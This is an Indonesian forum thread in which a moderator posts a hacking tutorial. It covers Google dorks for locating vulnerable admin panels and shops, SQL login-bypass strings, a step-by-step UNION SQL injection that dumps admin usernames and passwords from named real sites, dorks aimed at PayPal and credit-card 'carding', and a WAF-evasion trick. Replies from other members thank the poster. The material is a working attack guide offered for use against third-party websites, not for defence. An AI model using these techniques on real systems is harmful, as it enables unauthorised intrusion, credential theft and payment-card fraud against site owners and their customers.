Agen Terpercaya  
 
 
 
 
Pasang iklan, hanya lewat Contact Us.
Waspada penipuan iklan. Klik di sini untuk melihat daftar penipu.

DORKING

RayMantic

Moderator
Staff member
Moderator
Daftar
4 Oct 1988
Post
Like diterima
9.148
Bimabet
apa itu dork google ?

tentang dork.
Dalam bahasa inggris dork sendiri didefinisikan seperti MALAS, ya arti dork sebenarnya adalah malas, Tapi disini yang dimaksud dork sendiri adalah GOOGLE DORK(s). Saya bisa tebak, pasti jika saat anda mencari di google dengan kata kunci “Tutorial CD” saat membaca tutorialnya anda pasti menemukan kata-kata “Dork”. Ya, sebenarnya dork sendiri adalah senjata/tools yang bisa dibuat oleh semua orang dengan hanya bermodalkan otak kreatif saja jika anda sudah sedikit mengenal tentang dork, pasti anda menganggap dork itu sendiri gunanya adalah mencari target untuk SQLi, Deface, dll. Seperti inurl bla..bla..bla, intext bla..bla..bla, allinurl bla..bla..bla, +site:.bla..bla..bla yah seperti itulah :v Lanjut.. Sebelum tahu lebih dalam lagi tentang dork saya akan bahas tentang beberapa command yang sering digunakan dalam dork (Sebenarnya ada banyak, tapi saya hanya akan membahas berdasarkan frekuensi penggunaan yang paling tinggi saja) dan nantinya dipakai untuk membuat google dork.

inurl: seperti namanya, inurl berarti “di url” atau “dalam url” gunanya untuk mencari website yang di url-nya terdapat suatu string atau kata yang kita masukkan. Contoh: inurl:.******** maka yang akan muncul adalah site-site yang di urlnya mengandung “.********” Sedangkan saudaranya inurl adalah “allinurl:”, maksudnya command tersebut digunakan untuk mencari keseluruhan nama domain website yang telah kita input/tentukan.


intitle: seperti namanya, intitle berarti “di judul” atau “dalam judul” fungsinya untuk mencari site yang artikelnya memuat judul sesuai yang kita inginkian. Contohnya di sini saya bikin dork intitle:”kkk” hasilnya site yang judul postnya mengandung kata “kkkk” muncul. Intitle juga punya saudara lho :v sama seperti inurl, yaitu “allintext:” namun command tersebut tidak terlalu berpengaruh terhadap hasil pencarian, malah menurut saya memakai “intext:” lebih menguntungkan.


intext: nah kalau yang satu ini sifatnya lebih universal(umum) perintah ini sendiri artinya “di teks” atau “dalam teks” jadi, jika misalnya kita memasukkan dork intext:”avenged” di kotak pencarian google maka yang muncul adalah site yang mengandung kata “avenged” entah itu di url, judul, dll. Pokoknya semua yang mengandung kata “avenged” ditampilkan.


site: kalau yang ini berfungsi untuk mencari (Country domain) site yang kita tentukan, perintah ini juga sering digunakan untuk nentuin site negara mana yang pengen dia bobol dengan memasukan domain negaranya. Misalnya anda mau belanja online di webshop amerika maka dork yang harus anda buat kurang lebih seperti ini intext:”shop” site:.us.com.co.id dll

link: kalau ini saya kurang paham, karena jujur ane sendiri sama sekali belum pernah make yang beginian, tapi menurut blog tetangga, perintah ini gunanya mencari keseluruhan link yang berada dalam satu website. o_O saya gagal paham terlebih lagi gak ada contohnya.

maaf saya bukan heker yo :ampun:
 
Terakhir diubah:
cara bikin dork sendiri jadi GAK NIKUNG PUNYA ORANG LAIN :)
 
CONTOH WEBSITE VULN BYPASS ADMIN:
website :

- https://www.ranishfinance.com/admin/login.php <- klik disini untuk coba login

isi :
username : '=''or' atau ' or 1=1 limit 1 -- -+
password : '=''or' atau ' or 1=1 limit 1 -- -+
akan masuk ke panel administrator nya

#[website masih utuh tidak saya apa apa kan [jangan merusak karya orang ya] .karena memang buat contoh penggunaan dork jika website tersebut vuln dengan satu teknik deface yaitu bypass] biar bisa di coba login / ngintip panel admin nya.




cara by pass

Bahan - bahan :
1. Dork (Ada di bawah)
2. Shell / Uploader
3. Kopi GoodDay + Rokok :vosss
4. SABAR :3

Dork :

inurl:/login.php intext:login intext:adminsitrator

inurl:/admin/index.php intext:username

inurl:/admin/Admin.php intext:login

inurl:/administrator/login.php intext:username site:.

inurl:/login.php intext:administrator intext:login


copas pada mesin cari google

Dorking ke Google. Misal saya pake dork:
inurl:/administrator/login.php intext:admin login

buka website hasil pencarian :

isi dengan

username : '=''or' atau ' or 1=1 limit 1 -- -+
password : '=''or' atau ' or 1=1 limit 1 -- -+

tinggal sabar saja cari website yang vuln

:) gampang kan .
 
Terakhir diubah:
DORK => INJECT SQL

Dorking Aja Dulu,
Sampai Menemukan Site Yang Mempunyai Vuln Sql .

dork :
- inurl:/staff.php?id=
- inurl:/news.php?id=
kembangin sendiri gan.

Untuk Mengetahui Vuln Atau Tidak Kalian Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya,
Contoh :
http://www.jjhobby.com/viewproduct.php?id=9'
Nah Kek gitu deh, maka muncul You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

jika sudah ketemu ,kalian tinggal masukan +order+by+1--+-

Jadinya :
http://www.jjhobby.com/viewproduct.php?id=9+order+by+1--+-

Kalian Terusin Sampai Ketemu Error ,
jadinya
http://www.jjhobby.com/viewproduct.php?id=9+order+by+1--+-
=> Ga error
http://www.jjhobby.com/viewproduct.php?id=9+order+by+2--+-
Ga error
http://www.jjhobby.com/viewproduct.php?id=9+order+by+3--+-
Ga error
Sampai eror ya gan,

Nah disini saya eror di http://www.jjhobby.com/viewproduct.php?id=9+order+by+11--+-
Maka di Pastikan Table nya ada 10,
Jika Sudah Gitu Kalian Tinggal ganti +order+by dengan +union+select,jangan lupa di kasih tanda (-) di depan angka id.

jadinya : http://www.jjhobby.com/viewproduct.php?id=-9+union+select+3--+-
karena tadi table nya ada 10 jadinya http://www.jjhobby.com/viewproduct.
php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10--+- .
Maka Akan Terlihat angka Ajaib

Saya akan pilih Angka Dua Aja Biar Mesra wkwkwk.
Sekarang Kita masukan inject nya .

inject : (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.
columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Masukan Pas di angka yang muncul Tadi ,

Jadinya : http://www.jjhobby.com/viewproduct.
php?id=-9+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7,8,9,10--+-

Nah Disini Kalian Akan Lihat Banyak Table Table, Carilah Table Yang ada username dan password nya, kalo gak admin.

Nah Jika Sudah Lihat, Kalian Tinggal Dump istilahnya, Atau Buka Table Caranya Dengan Masukan Inject :
/*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+utenti)*/ ,

Disini user dan password saya di Table securityTab.dan nama table adminnya user_id. dan passwordnya user_pw. Jadi kalian edit inject nya jadi : /*!50000(SELECT+GROUP_CONCAT([user_id],0x3a,[user_pw]+SEPARATOR+0x3c62723e)+FROM+[securityTab])*/
Yang Saya Tandai [ ] Yang Harus Kalian Ganti.

Maka Jadinya:
http://www.jjhobby.com/viewproduct.phpid=-9+union+select+1,/*!50000(SELECT+GROUP_CONCAT(user_id,0x3a,user_pw+SEPARATOR+0x3c62723e)+FROM+securityTab)*/,3,4,5,6,7,8,9,10--+-
Nanti Saat Kalian Buka ,Akan Muncul user + password.

LIVE VIDEO :
https://mega.nz/#!mqwBhYDS!UvbUZsMtGuZrwd0VFfzl4_ZoLjM2Zh7Mnp85_2dD3sA
 
Terakhir diubah:
Mengembangkan dan type dork yg sering saya pake dan coba...dan dork ini di pake hmpir semua komunitas.

Inurl : merupakan website yang kita tuju, yang dimaksud dengan inurl ini mungkin adalah ( ' ) ini merupakan sebuah trick untuk melihat apakah website vuln atau tidak.
Intext : kata - kata yang kita tujukan, ini dapat mencakup semua hal yang kita ketahui, misalkan.
Site : Alamat negara yang kita tuju, dalam hal mengembangkan dork yang paling seting di gunakan adalah negara UK yaitu, Site:"UK"
Kalian bisa mengganti Uk menjadi domain semua negara sesuai hati dan kebutuhan.
.php?xx= : Akhir dari sebuah inurl atau alamat website yang kita tuju.

1. Mengembangkan inurl
2. Mengembangkan intext
3. Mengembangkan Site
4. Mengembangkan .php?xxx=

1. Contoh inurl:"shopping"
Kalian bisa mengganti dengan kata kata yang lainnya seperti :
1.shop_details
2.orders_details
3.shopping
4.customers

2. Contoh intext:"paypal" [ kata yang sering di gunakan untuk melakukan c**ding pp ]
Kalian bisa mengganti dengan kata kata yang lainnya seperti :
1.Master Card
2.Visa
3.payza
4. Amex
5. discover
intext tidak selalu terpaku kepada sebuah kartu credit seperti pp/cc,Perlu di ingat untuk dork, kalian tidak harus menggunakan semuanya dalam pencarian di google
Seperti inurl:"content".php?id=" intext:"paypal" Site:"UK"
[ Biasanya kalau kita tambahkan Site tetapi sudah ada intext tidak akan ada website yang tersedia ]
Jadi kalian bisa menghilangkan salah satu antara intext maupun site.

3. Contoh Site:"us"
Kalian bisa mengganti dengan kata kata yang lainnya seperti :
1. UK
2. COM
3. SG
4. MY
5. KR
6. NET
7. GR
8. dll (kode negara)

4. Contoh .php?id="
Kalian bisa mengganti dengan kata kata yang lainnya seperti :
1. .php?a="
2. .php?cartID="
3. .php?category_id="
4. .php?action="
5. .php?prodid="

contoh dork yang dikembangkan :

inurl: .php?prodid= intext: paypal site:us

silahkan belajar mengembangkan sendiri
 
injection SQL yang perlu WAF

cara inject sama seperti yang saya share di atas ...namun kadang ada website yang securitynya harus di buat lumpuh dengan cara bypass waf.
ciri site yang perlu di WAF jika setelah di select muncul seperti ini :
"not acceptable"
"forbiden 505"
cara waf hanya mengganti "+union + select" dengan "+/*!50000union*/+/*!50000select*/+"

jika butuh hex code bisa dengan link : http://www.convertstring.com/id/EncodeDecode/HexEncode

cara bikin code hex.
upload gambar yang mau di sisipkan di imagebam/ibb copas link seperti mau share di forum .
link gambar di copas di link atas tinggal di proses dan di copy code hex nya .
 
hhmmm ini mah tugas pas smester 5 dulu mlah nemu dimari dan sayang ane udah lulus.... tap ini lbih terperinci penjelasannya dbanding yg di lainnya... pngalmanku yg super nubie yg seru itu pas nyari dork yg sesuai di webnya itu susah susah gampang... hrs kreatif hehe
 
mau kerja sama gk gan ? add wikipedia ane t[.]me/sameasbefore
Kerjasama untuk apa ini suhu
hhmmm ini mah tugas pas smester 5 dulu mlah nemu dimari dan sayang ane udah lulus.... tap ini lbih terperinci penjelasannya dbanding yg di lainnya... pngalmanku yg super nubie yg seru itu pas nyari dork yg sesuai di webnya itu susah susah gampang... hrs kreatif hehe
Dulu kuliah di mana suhu...byk variabel yg bs untuk mencari dork..bener butuh pengembangan..coba A coba C di gabungin AB cari batas juga ..komposisi biar tepat
 
Bermanfaat sekali, nanti tak coba ach....
Terima kasih, sebelumnya
Suhu @MRX-
 
Gaple Online Indonesia
Pasang iklan hanya lewat CONTACT US
Back
Top
We are now part of LS Media Ltd